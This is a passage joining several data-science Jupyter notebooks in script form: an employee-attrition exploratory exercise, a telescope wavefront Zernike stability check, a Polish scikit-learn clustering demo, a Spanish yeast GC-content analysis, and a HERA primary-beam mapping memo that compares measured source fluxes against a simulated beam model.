dataset's basic information. # # <br> # **First, display the <span style="color:royalblue">dimensions</span> (a.k.a. shape) of the dataset.** # + # Dataframe dimensions # - # **Next, display the <span style="color:royalblue">datatypes</span> of the features.** # * Which are the **numeric** features? # * Which are the **categorical** features? # + # Column datatypes # - # **Next, display the first 10 <span style="color:royalblue">example observations</span> from the dataset.** # * Remember, the purpose is not to perform rigorous analysis. # * Instead, it's to get a **qualitative "feel"** for the dataset. # + # First 10 rows of data # - # **Finally, display the last 10 rows of data to check for any signs of <span style="color:royalblue">corrupted data</span>.** # * Corrupted data will usually appear as a bunch of gibberish. It will be obvious. # * Most of the time, you won't have corrupted data... but this is still a quick and easy check. # + # Last 10 rows of data # - # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div> # <span id="numeric"></span> # # 2. Distributions of numeric features # # One of the most enlightening data exploration tasks is plotting the distributions of your features. # # <br> # **First, plot the Pandas <span style="color:royalblue">histogram grid</span> for all the numeric features.** # # Feel free to mess around with the settings and formatting, but here are the settings we used for reference: # * We made the figure size 10x10 # * We also rotated x-labels by -45 degrees # + # Plot histogram grid # - # **Next, display formal <span style="color:royalblue">summary statistics</span> for the numeric features.** # + # Summarize numerical features # - # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div> # <span id="categorical"></span> # # 3. Distributions of categorical features # # Next, let's take a look at the distributions of our categorical features. # # <br> # **First, display the <span style="color:royalblue">summary statistics</span> for categorical features in the dataset.** # + # Summarize categorical features # - # **Using a loop, display <span style="color:royalblue">bar plots</span> for each of the categorical features.** # + # Plot bar plot for each categorical feature # - # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div> # <span id="segmentations"></span> # # 4. Segmentations # # Next, let's create some segmentations. Segmentations are powerful ways to cut the data to observe the relationship between categorical features and numeric features. # # The code is provided in this section as we didn't cover it in our lesson. If everything was done properly upto this point, you should be able to just execute the code below to display the charts. # # **First, display a <span style="color:royalblue">violin plot</span> with <code style="color:steelblue">'status'</code> on the y-axis and <code style="color:steelblue">'satisfaction'</code> on the x-axis.** # Segment satisfaction by status and plot distributions sns.violinplot(y="status", x="satisfaction", data=df) # **Next, display a violin plot that segments <code style="color:steelblue">'last_evaluation'</code> by <code style="color:steelblue">'status'</code>.** # Segment last_evaluation by status and plot distributions sns.violinplot(y="status", x="last_evaluation", data=df) # **<span style="color:royalblue">Group by</span> <code style="color:steelblue">'status'</code> and calculate the average value of each feature within each class.** # Segment by status and display the means within each class df.groupby('status').mean() # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div> # <span id="advanced-segmentations"></span> # # 5. Advanced segmentations # # Because the target variable is categorical, it can often be helpful to expand your segmentation analysis. # # <br> # **Now, we'll see how to do bivariate segmentations, which can be produced with the <code style="color:steelblue">sns.lmplot()</code> function from the Seaborn library.** # * <code style="color:steelblue">sns.lmplot()</code> is essentially a regular **scatterplot** with additional options. # * For example, we can color each point based on its <code style="color:steelblue">'status'</code>. # * To do so, we'll use the <code style="color:steelblue">hue=</code> argument. # Scatterplot of satisfaction vs. last_evaluation sns.lmplot(y="satisfaction", x="last_evaluation", data=df, hue='status', fit_reg=None) # **Plot another scatterplot of <code style="color:steelblue">'satisfaction'</code> and <code style="color:steelblue">'last_evaluation'</code>, but only for employees who have <code style="color:crimson">'Left'</code>.** # * **Hint:** Do you still need the <code style="color:steelblue">hue=</code> argument? # * **Hint:** How might you change the <code style="color:steelblue">data=df</code> argument? # Scatterplot of satisfaction vs. last_evaluation, only those who have left sns.lmplot(y="satisfaction", x="last_evaluation", data=df[df.status == 'Left'], hue='status', fit_reg=None) # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div> # <br> # # Congratulations for making through Exploratory Analysis! # # Before powering on, we recommend going back and reviewing the charts you made. This time, since you've already created them, you can move through more quickly and really start to understand the **story** behind the data. # # As a reminder, here are a few things you did in this module: # * You explored basic information about your dataset. # * You plotted distributions of numeric and categorical features. # * You segmented your dataset by <code style="color:steelblue">'status'</code>. # * And you dove into some advanced, bivariate segmentations. # # <div style="text-align:center; margin: 40px 0 40px 0; font-weight:bold"> # [Back to Contents](#toc) # </div>
Day_3/Student/Exercise 1 - Exploratory Analyis.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import time from datetime import datetime import os import sys import numpy as np import ipympl import matplotlib import matplotlib.pyplot as plt import pandas as pd from pathlib import Path import astropy.units as u from astropy import stats from astropy.io import fits from mmtwfs.wfs import * from mmtwfs.zernike import ZernikeVector from mmtwfs.telescope import MMT # - # %cd /Users/tim/MMT/wfsdat/20180209 rootdir = Path(".") z = ZernikeVector()q z.load("wfs_ff_cal_img_2018.0209.033646.zernike") zz = ZernikeVector(modestart=23, **z.coeffs) zz.rms, z.rms files = sorted(list(rootdir.glob("wfs_*.fits"))) ngood = 0 dataframes = [] norm_dataframes = [] for f in files: full_zern = str(f.stem) + ".zernike" dtime = datetime.strptime(f.stem, "wfs_ff_cal_img_%Y.%m%d.%H%M%S") if Path(full_zern).exists(): zv = ZernikeVector() zv.load(full_zern) norm_zv = zv.copy() norm_zv.normalize() df_zv = pd.DataFrame(zv.coeffs, index=[1]) df_norm = pd.DataFrame(norm_zv.coeffs, index=[1]) df_zv['time'] = dtime df_norm['time'] = dtime df_zv['rms'] = zv.rms df_norm['rms'] = norm_zv.rms dataframes.append(df_zv) norm_dataframes.append(df_norm) # + zdf = pd.concat(dataframes) zdf_norm = pd.concat(norm_dataframes) # create a date-time index so we can group and analyze the data by timestamps zdf = zdf.set_index(pd.DatetimeIndex(zdf['time'], name='ut')) zdf_norm = zdf_norm.set_index(pd.DatetimeIndex(zdf_norm['time'], name='ut')) zdf_trim = zdf[zdf['rms'] < 500.] # - plt.close('all') zdf_trim.plot(y='Z05') plt.show()
notebooks/model stability.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Wprowadzenie # Skrypt pokazuje jak użyć pakietu SciKit do grupowania danych. Rozważane są dwa przykłady: dwuwymiarowe dane wygenerowane losowo z mieszaniny rozkładów gaussowskich oraz dane IRIS. # + % matplotlib inline import numpy as np import matplotlib.pyplot as plt import pandas as pd import sklearn.metrics as metrics import pprint from sklearn.cluster import KMeans, MiniBatchKMeans, Birch, DBSCAN # + from clustering_indexex import (davies_bouldin_index, dunn_index) def plotClustering(X, plt_labels, features=(0,1), ax=plt): if features[0] == features[1]: ax.hist( X[:, features[0]], edgecolor='black' ) else: ax.scatter( X[:,features[0]], X[:,features[1]], c=plt_labels, edgecolor='black' ) def positive_labels(labels): if np.any(labels < 0): return labels + np.abs(np.min(labels)) return labels def count_metrics(X, labels, centroids=None): pprint.pprint({ 'Silhouette': metrics.silhouette_score(X, labels, metric='euclidean'), 'dunn_index': dunn_index(X, labels, centroids), 'davies_bouldin_index': davies_bouldin_index(X, labels, centroids) }) # - # ## 1. Pierwszy zestaw danych # Dwuwymiarowe dane wygenerowane losowo z mieszaniny rozkładów gaussowskich # + from sklearn import datasets centers_ = [[1, 1], [3, 3], [5, 1]] X, labels = datasets.make_blobs( n_samples=3000, n_features=2, centers=centers_, cluster_std=0.5 ) plotClustering(X, labels) # - # ### Grupowanie za pomocą KMeans # sma # n-init: Number of time the k-means algorithm will be run with different centroid # seeds. The final results will be the best output of n_init consecutive # runs in terms of inertia. fig, axes = plt.subplots(1,3) fig.set_size_inches(12,4) for ax, n_init in zip(axes, [1,5,20]): k_means = KMeans( init='k-means++', n_clusters=3, n_init=n_init ) k_means.fit(X) plotClustering(X, k_means.labels_, ax=ax) ax.set_title(f'n_init: {n_init}') count_metrics(X, k_means.labels_, k_means.cluster_centers_) # ### Grupowanie za pomocą MiniBatchKMeans # #### mini_batch_k_means = MiniBatchKMeans(init='k-means++', n_clusters=3, batch_size=100, n_init=1, max_no_improvement=10, verbose=0, random_state=0) # mini_batch_k_means.fit(X) # # plotClustering(X, mini_batch_k_means.labels_) # count_metrics(X, mini_batch_k_means.labels_, mini_batch_k_means.cluster_centers_) # ### Grupowanie za pomocą Birch bez wtórnego grupowania # + # threshold [float, default 0.5]: # The radius of the subcluster obtained by # merging a new sample and the closest subcluster should be lesser than the threshold. # Otherwise a new subcluster is started. # Setting this value to be very low promotes splitting and vice-versa. fig, axes = plt.subplots(1,4) fig.set_size_inches(16,4) for ax, threshold in zip(axes, [0.45, 0.5, 0.75, 0.9]): birch = Birch(threshold=threshold, n_clusters=None) birch.fit(X) plotClustering(X, birch.labels_, ax=ax) centers = birch.root_.centroids_ ax.scatter(centers[:, 0], centers[:, 1], c='r') ax.set_title(f'Treshold: {threshold}') count_metrics(X, birch.labels_, birch.subcluster_centers_) # + birch = Birch(threshold=0.25, n_clusters=None) birch.fit(X) plotClustering(X, birch.labels_) centers = birch.root_.centroids_ print(centers.shape) plt.scatter(centers[:, 0], centers[:, 1], c='r') plt.suptitle('root centers') plt.show() # plt.set_title(f'Birch treshold: 0.25') plotClustering(X, birch.labels_) centers = birch.subcluster_centers_ plt.scatter(centers[:, 0], centers[:, 1], c='r') plt.suptitle('subcluster_centers_') plt.show() # - # ### Grupowanie za pomocą Birch z wtórnym grupowaniem # + birch = Birch(threshold=0.75, n_clusters=3) birch.fit(X) plotClustering(X, birch.labels_) count_metrics(X, birch.labels_, birch.root_.centroids_) # - # ### Grupowanie za pomocą DBScan # + # eps [float, optional] # The maximum distance between two samples for them to be considered as # in the same neighborhood. fig, axes = plt.subplots(1,5) fig.set_size_inches(20,4) for ax, eps in zip(axes, [0.1, 0.2, 0.3, 0.4, 0.5]): dbscan = DBSCAN(eps=eps, min_samples=25) dbscan.fit(X) plotClustering(X, dbscan.labels_, ax=ax) ax.set_title(f'eps: {eps}') ax.scatter( X[dbscan.labels_ == -1][:,0], X[dbscan.labels_ == -1][:,1], c='red' ) labels = positive_labels(dbscan.labels_) centers = np.empty((X.shape[1],np.unique(labels).size)) for i in range(np.unique(labels).shape[0] -1): l = X.T[:,labels == i] centers[:,i] = np.sum(l, axis=1)/l.shape[1] count_metrics(X, labels, centers.T) # - # ## 2. Drugi zestaw danych # Dane IRIS from sklearn import datasets iris = datasets.load_iris() X = iris.data # + k_means = KMeans(init='k-means++', n_clusters=3, n_init=1) k_means.fit(X) fig, axes = plt.subplots(X.shape[-1], X.shape[-1]) fig.set_size_inches(12,12) for i in range(X.shape[-1]): for j in range(X.shape[-1]): plotClustering(X, k_means.labels_, features=(i,j), ax=axes[i][j]) for i in range(X.shape[-1]): axes[X.shape[-1] - 1][i].set_xlabel(iris.feature_names[i]) axes[i][0].set_ylabel(iris.feature_names[i]) # - birch = Birch(threshold=0.75, n_clusters=3) birch.fit(X) fig, axes = plt.subplots(X.shape[-1], X.shape[-1]) fig.set_size_inches(12,12) for i in range(X.shape[-1]): for j in range(X.shape[-1]): plotClustering(X, birch.labels_, features=(i,j), ax=axes[i][j]) for i in range(X.shape[-1]): axes[X.shape[-1] - 1][i].set_xlabel(iris.feature_names[i]) axes[i][0].set_ylabel(iris.feature_names[i]) # + dbscan = DBSCAN(eps=0.5, min_samples=5) dbscan.fit(X) fig, axes = plt.subplots(X.shape[-1], X.shape[-1]) fig.set_size_inches(12,12) for i in range(X.shape[-1]): for j in range(X.shape[-1]): plotClustering(X, dbscan.labels_, features=(i,j), ax=axes[i][j]) for i in range(X.shape[-1]): axes[X.shape[-1] - 1][i].set_xlabel(iris.feature_names[i]) axes[i][0].set_ylabel(iris.feature_names[i]) # - # for t in [ # k_means, # birch, # dbscan # ]: # count_metrics(X, t.labels_) labels_db = positive_labels(dbscan.labels_) centers_db = np.empty((X.shape[1], np.unique(labels_db).size)).T for i in range(np.unique(labels_db).size): l = X[labels_db == i, :] centers_db[i, :] = l.mean(axis=0) count_metrics(X, k_means.labels_, k_means.cluster_centers_) count_metrics(X, birch.labels_, birch.root_.centroids_) count_metrics(X, labels_db, centers_db) X = np.arange(10) plt.scatter(X,X,c=X, cmap='tab10')
data_mining/04List/0_1_SciKit_Clustering_Demo.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Avances: Análisis descriptivo de datos import numpy as np import math import pandas as pd import seaborn as sns from datetime import datetime from matplotlib import pyplot as plt # %matplotlib inline plt.rcParams['figure.figsize']=20,14 import warnings warnings.filterwarnings('ignore') df_tot=pd.read_csv('base_anal_descr.csv') df_lev=pd.read_csv('base_levadura_anal_descr.csv') df1=pd.read_csv('baseLevadura_crom_I.csv') df2=pd.read_csv('baseLevadura_crom_II.csv') df3=pd.read_csv('baseLevadura_crom_III.csv') df4=pd.read_csv('baseLevadura_crom_IV.csv') df5=pd.read_csv('baseLevadura_crom_V.csv') df6=pd.read_csv('baseLevadura_crom_VI.csv') df7=pd.read_csv('baseLevadura_crom_VII.csv') df8=pd.read_csv('baseLevadura_crom_VIII.csv') df9=pd.read_csv('baseLevadura_crom_IX.csv') df10=pd.read_csv('baseLevadura_crom_X.csv') df11=pd.read_csv('baseLevadura_crom_XI.csv') df12=pd.read_csv('baseLevadura_crom_XII.csv') df13=pd.read_csv('baseLevadura_crom_XIII.csv') df14=pd.read_csv('baseLevadura_crom_XIV.csv') df15=pd.read_csv('baseLevadura_crom_XV.csv') df16=pd.read_csv('baseLevadura_crom_XVI.csv') var='GC_content' var2='dry' # ## Comparación de distribuciones - GC_content sns.set_style("darkgrid") f, axes = plt.subplots(2,2, figsize=(10,10)) vis_1=sns.distplot(df_tot[var], bins=50, ax=axes[0,0]) vis_2=sns.distplot(df_lev[var], bins=50, ax=axes[0,1]) vis_3=sns.distplot(df1[var], bins=50, ax=axes[1,0]) vis_4=sns.distplot(df6[var], bins=50, ax=axes[1,1]) # ## Comparación de la varianza intracromosómica en 5 secciones f, axes = plt.subplots(1,2, figsize=(15,5)) z1 = sns.violinplot(data=df1, x='section', y=var, ax=axes[0]) z2 = sns.violinplot(data=df6, x='section', y=var, ax=axes[1]) # ## Histogramas de abundancias de cada subsección dentro de una misma sección. f, axes = plt.subplots(1,5, figsize=(15,5)) lista1=[df1[(df1.section==1) & (df1.subsection==1.0)][var], df1[(df1.section==1) & (df1.subsection==2.0)][var], df1[(df1.section==1) & (df1.subsection==3.0)][var], df1[(df1.section==1) & (df1.subsection==4.0)][var], df1[(df1.section==1) & (df1.subsection==5.0)][var]] lista2=[df1[(df1.section==2) & (df1.subsection==1.0)][var], df1[(df1.section==2) & (df1.subsection==2.0)][var], df1[(df1.section==2) & (df1.subsection==3.0)][var], df1[(df1.section==2) & (df1.subsection==4.0)][var], df1[(df1.section==2) & (df1.subsection==5.0)][var]] lista3=[df1[(df1.section==3) & (df1.subsection==1.0)][var], df1[(df1.section==3) & (df1.subsection==2.0)][var], df1[(df1.section==3) & (df1.subsection==3.0)][var], df1[(df1.section==3) & (df1.subsection==4.0)][var], df1[(df1.section==3) & (df1.subsection==5.0)][var]] lista4=[df1[(df1.section==4) & (df1.subsection==1.0)][var], df1[(df1.section==4) & (df1.subsection==2.0)][var], df1[(df1.section==4) & (df1.subsection==3.0)][var], df1[(df1.section==4) & (df1.subsection==4.0)][var], df1[(df1.section==4) & (df1.subsection==5.0)][var]] lista5=[df1[(df1.section==5) & (df1.subsection==1.0)][var], df1[(df1.section==5) & (df1.subsection==2.0)][var], df1[(df1.section==5) & (df1.subsection==3.0)][var], df1[(df1.section==5) & (df1.subsection==4.0)][var], df1[(df1.section==5) & (df1.subsection==5.0)][var]] axes[0].hist(lista1, bins=20, stacked=True, rwidth = 1, label = df1['subsection'].unique()) axes[1].hist(lista1, bins=20, stacked=True, rwidth = 1, label = df1['subsection'].unique()) axes[2].hist(lista1, bins=20, stacked=True, rwidth = 1, label = df1['subsection'].unique()) axes[3].hist(lista1, bins=20, stacked=True, rwidth = 1, label = df1['subsection'].unique()) axes[4].hist(lista1, bins=20, stacked=True, rwidth = 1, label = df1['subsection'].unique()) plt.legend() plt.show() f, axes = plt.subplots(1,2, figsize=(15,5)) k1 = sns.kdeplot(df1[df1.section==1][var], df1[df1.section==1][var2], shade=True, shade_lowest=False, cmap='Reds', ax=axes[0]) k1bis = sns.kdeplot(df1[df1.section==1][var], df1[df1.section==1][var2], cmap='Reds', ax=axes[0]) k2 = sns.kdeplot(df6[df6.section==1][var], df6[df6.section==1][var2], shade=True, shade_lowest=False, cmap='Reds', ax=axes[1]) k2bis = sns.kdeplot(df6[df6.section==1][var], df6[df6.section==1][var2], cmap='Reds', ax=axes[1])
anal_descr_script.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # # ASU HERA Memo: Mapping HERA's Primary Beam # ### <NAME> # One of the challenges of observing highly redshifted 21 cm emission is separating the signal from bright foreground sources. Simulations have found that when these bright foreground sources are far from HERA's center, their flux is significantly reduced due to beam attenuation and they become difficult to separate from the 21 cm signal. Knowledge of the shape of the beam at different frequencies will allow for precise calibration of the array, which will help to isolate the 21 cm cosmological signal from bright foregrounds. The goal of this notebook is to observe HERA # s beam response at different frequency ranges by using IDR2.1 data to observe foreground point sources as they drift across the beam. # # ## 1. Imaging IDR2.1 Data # # To map HERA's primary beam by tracking sources as they move across the beam, we need to image a set of HERA data that is sensitive enough to that we can accurately measure of flux of sources as they move across the beam. The data set that we have decided to image to make this measurement is the [IDR2.1 data release](http://reionization.org/wp-content/uploads/2013/03/HERA_Memo45_IDR2.1.html). H1C IDR 2.1 contains pre-calibrated, LST-binned data from observations made from 18 nearly-consecutive nights of data. Since this data has been binned over many days of observation, it should provide the sensitivity needed to accurately measure the flux of the sources we will choose to track across the beam. # # One change that needed to be made to this data before making beam measurements from the images was splitting each data file from one 20 minute time integration into 10 two-minute time integrations. The reason for doing this was to create more images with less time passage between subsequent images, thus creating a smoother beam measurement for each source. Splitting the images into two-minute time integrations does reduce the sensitivity of the measurements but they should still allow us to make accurate beam measurements. We use pyuvdata to split these files in two-minute time integrations. # # Once we've created a set of two-minute time integration data, we image by using CASA to flag all of the autocorrelations and run the CLEAN command below on all two time integrations: # # ``` # clean(niter = 6000, weighting = 'briggs', robust = '-0.5', # imsize = [512,512], cell = ['250arcsec'], mode = 'mfs', nterms = 1) # ``` # We also image the data in bandwidths of 10 MHz (110-120 MHz, 120-130 MHz, ...) and 20 MHz (110-130 MHz, 130-150 MHz, ...), so that we can measure the beam response at different frequencies. This is done by changing the spectral window in the CLEAN command: # # ``` # # # Example CLEAN command for imaging data using 180-190 MHz frequencies # # clean(niter = 6000, weighting = 'briggs', robust = '-0.5', imsize = [512,512], # cell = ['250arcsec'], mode = 'mfs', nterms = 1, spw = '0:819~912') # # # ``` # # Now that we've imaged all of the time split IDR2.1 data at different frequency ranges, we use these images to make beam measurements of sources as they track across the beam. # ## 2. Tracking Foreground Sources # With the images generated for each set of frequencies, we can start tracking bright foreground sources as they drift across the beam. To find these sources, the [HERA_calibration_sources](https://github.com/dannyjacobs/asu_hera/tree/master/HERA_calibration_sources) code is used. This package uses the TGSS ADR catalogue to find radio sources within a right ascension and declination range and some minimum flux. Once the desired values are entered, the name of the source, its right ascension, declination, and total flux are returned in a pandas dataframe. # # Using this package, we can isolate bright sources within a narrow declination range over the entire right ascension range that was observed in IDR 2.1. We keep the declination range narrow so that the final observed beam map can be compared to a cut from the beam model centered at HERA's zenith declination. # + from glob import glob import numpy as np import matplotlib.pyplot as plt from astropy.io import fits from astropy import units as u from astropy.wcs import WCS from HERA_calibration_sources import add_fluxes from pyuvdata import UVBeam import healpy as hp import warnings from astropy.utils.exceptions import AstropyWarning warnings.simplefilter('ignore', category=AstropyWarning) plt.rc('font', family='serif') plt.rc('xtick', labelsize='small') plt.rc('ytick', labelsize='small') # - tb = add_fluxes(RA_range=('00:00:00','13:00:00'),dec_range=1, min_flux=6) tb # The function below is where we track the flux sources found in the HERA_calibration_sources code as they move across the beam. For each image, the function loops through the list of sources to find the flux of the source if it exists in the image. We find whether or not the source is in the image by converting the source's right ascension and declination into a pixel value using astropy. The flux found at this pixel value is then divided by its true total flux, taken from the TGSS ADR catalog, to obtain a beam measurement at a particular angle from HERA's zenith. These values are then plotted as a function of angle from the telescope's zenith and compared to the beam model. def track_sources(fits_files, sources, pos_buffer = 3): ''' Creates a beam measurement for each source by measuring their flux in fits images generated from HERA data and dividing by their true total flux. Parameters ---------- fits_files : array-like Fits files generated from the imaging pipeline to take flux measurements from sources : dict Dictionary of sources containing information about their positions and total flux generated by HERA_calibration_sources. Used to track sources to make beam measurements pos_buffer : int, optional Returns ------- plot_data : dict Dictionary containing the zenith angle and corresponding beam measurement for each source. The key is the source name. ''' plot_data = {v['Name of Center']: {'RA_diff': [], 'Flux': []} for _,v in tb.iterrows()} for f in fits_files: with fits.open(f) as HDU: # Read in file information fits_info = HDU[0].header ax1 = fits_info['NAXIS1'] ax2 = fits_info['NAXIS2'] c_ra = fits_info['OBSRA'] c_dec = fits_info['OBSDEC'] pix_size = abs(fits_info['CDELT1']) # Flip to data to correct the axes data = HDU[0].data data = np.flip(data[0][0],axis=0) w = WCS(f) for _,src in sources.iterrows(): # Convert a position to pixel values idx_1,idx_2 = w.all_world2pix(src['RA'],src['Dec'],0,0,0)[:2] if not np.isnan(idx_1) and not np.isnan(idx_2): idx_1 = int(idx_1) idx_2 = int(ax2-idx_2) # ax1 is the right-most pixel, ax2 is the bottom-most pixel # we want to make sure that the both values are within the # correct range if (pos_buffer < idx_1 < ax1-pos_buffer) and (pos_buffer < idx_2 < ax2-pos_buffer): max_flux = np.abs(data[idx_2-pos_buffer:idx_2+pos_buffer,idx_1-pos_buffer:idx_1+pos_buffer]).max() plot_data[src['Name of Center']]['Flux'].append(max_flux/src['Total flux in region']) ra_diff = c_ra-src['RA'] # Correct for the difference in c_ra error if ra_diff > pix_size*ax1: ra_diff -= 360 if ra_diff < -pix_size*ax1: ra_diff += 360 plot_data[src['Name of Center']]['RA_diff'].append(ra_diff) return plot_data # With the function below, we combine the beam measurements made from the functions above into a single beam measurement. This is done by gridding the measurements by zenith angle and averaging overlapping measurements made at each angle. def observed_beam(cleaned_set): ''' Creates a single beam cut from beam measurements made for each source Parameters ---------- cleaned_set : dict Dictionary of normal flux values and their corresponding angle from zenith for each source. Obtained from the track_sources function. Returns ------- theta : array-like Zenith angles for the final beam measurement obs_beam : array-like Single beam measurement compiled from individual measurements beam_std : array-like Standard deviation of the beam for each zenith angle measure ''' n = 0 x = [] y = [] min_x = 30 max_x = -30 for _,src in plot_data.iteritems(): x.append(src['RA_diff']) flux = np.array(src['Flux']) y.append(flux) if len(src['Flux']) > 0: if len(src['Flux']) > n: n = len(src['Flux']) if min(src['RA_diff']) < min_x: min_x = min(src['RA_diff']) if max(src['RA_diff']) > max_x: max_x = max(src['RA_diff']) bins = np.linspace(min_x, max_x, n) vals = np.zeros(n) counts = np.ones(n) std_arr = [[] for _ in range(n)] for i, d in enumerate(x): idx = np.digitize(d, bins) - 1 vals[idx] += y[i] counts[idx] += 1 for m,n in enumerate(idx): std_arr[n].append(y[i][m]) obs_beam = vals/counts obs_beam /= obs_beam.max() obs_beam = 10*np.log10(obs_beam) beam_std = np.array([np.std(10*np.log10(std)) for std in std_arr]) return bins, obs_beam, beam_std # Using the two functions above with the source finding code, we can create a single beam measurement. We use images generated using the frequencies 110-130 MHz to make our first beam measurement. If this is done correctly, we hope to see a beam measurement that appears to be roughly gaussian looking at the zenith angles we will be measuring out to. # + freq_range = '110-130MHz' freq_ends = [110,130] files = np.sort(glob('/data6/HERA/HERA_imaging/IDR2/'+freq_range+'/imgs/*fits')) plot_data = track_sources(files,tb) theta, obs_beam, obs_std = observed_beam(plot_data) # + plt.figure(figsize=(15,8)) for key,item in plot_data.items(): flux = np.array(item['Flux']) plt.plot(item['RA_diff'],10*np.log10(flux),label=key) plt.xlabel(r'Beam Angle $(^\circ)$') plt.ylabel(r'Amplitude (dBi)') plt.legend() plt.grid() plt.show() # - plt.figure(figsize=(12,7)) plt.xlabel(r'Beam Angle $(^\circ)$') plt.ylabel('Amplitude (dB)') plt.title('Measured Beam Sensitivity: ') plt.errorbar(theta[4:-4], obs_beam[4:-4], yerr=obs_std[4:-4]) plt.grid() plt.show() # The beam measurement above looks roughly like what we were expecting. The real test will comparing the beam measurement to a simulation of HERA's beam at these frequencies. We can now look into modeling HERA's beam at the range of frequencies used in this measurement, 110-130 MHz. # ## 3. Modeling HERA's Beam # To model HERA's beam, which we will use to compare to our beam measurement, we will use a electromagnetic simulation of HERA's antenna created by <NAME>. This simulation contains the beam response at every integer frequency that HERA is currently capable of observing. We'll start by importing this simulation using the UVBeam object in [pyuvdata](https://github.com/RadioAstronomySoftwareGroup/pyuvdata). hera_beam = UVBeam() #Instantiating HERA's beam as a UVBeam object hera_beam.read_beamfits("NF_HERA_power_beam_healpix.fits") #Reading in the beam model # Now, we define a function to find HERA's beam at a specific frequency. We can use this function to find the shape of the beam over a range of frequencies by averaging beam models over a particular frequency range. def hera_beam_freq_slice(hera_beam, freq, beam_center = 90, ang_from_center = 15, n = 100): ''' Returns a beam cut at a defined frequency Parameters ---------- hera_beam : UVBeam HERA beam model simulation read into a UVBeam object freq: int Frequency to pull from simulation beam_center: float, optional Zenith declination, set to 90 degrees in the simulation ang_from_center: int Angle from zenith to map the simulated beam out to n: int Number of points in the plot Returns ------- ang : array-like Angle from zenith for each point in the beam model beam_slice: array-like Beam model at the given frequency and angle range ''' ang = np.linspace(beam_center-ang_from_center,beam_center+ang_from_center,n) beam_slice = [] beam_map = hera_beam.data_array[0][0][0][freq-100] beam_map_norm = beam_map/np.max(beam_map) for i in ang: beam_slice.append(hp.get_interp_val(beam_map_norm,0, i, lonlat=True)) return ang, np.array(beam_slice) # To make sure that this function works, we can plot a few beam models to see they look similar to the plots made in [beam simulation memo](https://github.com/Nicolas-Fagnoni/Simulations/blob/master/Memo/Memo%20-%20CST%20simulation%20of%20HERA%20and%20comparison%20with%20measurements.pdf). # + freqs = np.array([100,120,140,160,180,200]) model_beam = np.zeros(100) fig, axs = plt.subplots(2,3, figsize=(15, 8), facecolor='w', edgecolor='k',sharex='col') fig.subplots_adjust(hspace = .3) axs = axs.ravel() for i,freq in enumerate(freqs): ang, beam = hera_beam_freq_slice(hera_beam, freq, ang_from_center=45, n=100) model_beam = 10*np.log10(beam) axs[i].plot(ang-90,model_beam,'k--') axs[i].set_title('Beam Model: ' + str(freq) + ' MHz') axs[i].grid() if i > 2: axs[i].set_xlabel('Beam Angle $(^\circ)$') if i == 0 or i == 3: axs[i].set_ylabel('Amplitude (dBi)') plt.show() # - # We can also plot a model averaged over a frequency range against models at a single frequency to make sure the averaged model is consistent with the single frequency models. # + freqs = np.arange(110,130) model_beam = np.zeros(200) plt.figure(figsize=(15,8)) for freq in freqs: ang, beam = hera_beam_freq_slice(hera_beam, freq, ang_from_center=90, n=200) model_beam += beam if freq%5 == 0: plt.plot(ang-90,10*np.log10(beam),label=(str(freq) + ' MHz')) model_beam /= freqs.shape[0] model_beam = 10*np.log10(model_beam) plt.xlabel(r'Beam Angle $(^\circ)$') plt.ylabel(r'Amplitude (dBi)') plt.title(r'Beam Model: 110-130 MHz') plt.plot(ang-90,model_beam,'k--', label = '110-130 MHz') plt.grid() plt.legend() plt.show() # - # ## 4. Comparing the Beam Measurement and the Model # With the measurement and simulation both made, we can now plot the simulation against the model for the frequency range 110-130 MHz. We will also plot all of the 20 MHz and 10 MHz bandwith beam measurements to see how they compare to the models. # + freqs = np.arange(freq_ends[0],freq_ends[1]) model_beam = [] for freq in freqs: ang, beam = hera_beam_freq_slice(hera_beam, freq, ang_from_center=15, n=100) model_beam.append(beam) model_beam = np.mean(model_beam, axis = 0) model_beam /= model_beam.max() model_beam = 10*np.log10(model_beam) # + plt.figure(figsize=(12,7)) plt.plot(ang-90,model_beam,'k--',label=(r'Model: ' + freq_range)) plt.errorbar(theta[5:-3],obs_beam[4:-4],yerr=obs_std[4:-4],label='Data: ' + freq_range) plt.legend() plt.title('Model vs. Observed Extragalactic Sources: ' + freq_range) plt.xlabel(r'Beam Angle ($^\circ$)') plt.ylabel('Amplitude (dB)') plt.grid() plt.show() # - # As we can see above, the beam map created from measuring the flux of the sources matches the model well out to a zenith angle of ~$12^\circ$. It is possible that the noise level is being hit and that is what's causing the beam measurement to flatten out past ~$12^\circ$ from zenith, but this is something that will require more work. # # Now that we've successfully produced a beam measurement, we can use the same procedure as above for the rest of the 20 MHz bandwidth images. # + freq_range = ['110-130MHz','130-150MHz','150-170MHz','170-190MHz'] freq_ends = [[110,130],[130,150],[150,170],[170,190]] fig, axs = plt.subplots(2,2, figsize=(15, 10), facecolor='w', edgecolor='k') fig.subplots_adjust(hspace = .3) axs = axs.ravel() for i,freq_set in enumerate(freq_range): # Find the files and track the sources files = np.sort(glob('/data6/HERA/HERA_imaging/IDR2/' + freq_set + '/imgs/*fits')) plot_data = track_sources(files,tb) # Model the beam for a range of frequencies freqs = np.arange(freq_ends[i][0],freq_ends[i][1]) model_beam = [] for freq in freqs: ang, beam = hera_beam_freq_slice(hera_beam, freq, ang_from_center=15, n=100) model_beam.append(beam) model_beam = np.mean(model_beam, axis = 0) model_beam /= model_beam.max() model_beam = 10*np.log10(model_beam) # Find the measured beam and standard deviation for error bars theta, obs_beam, obs_std = 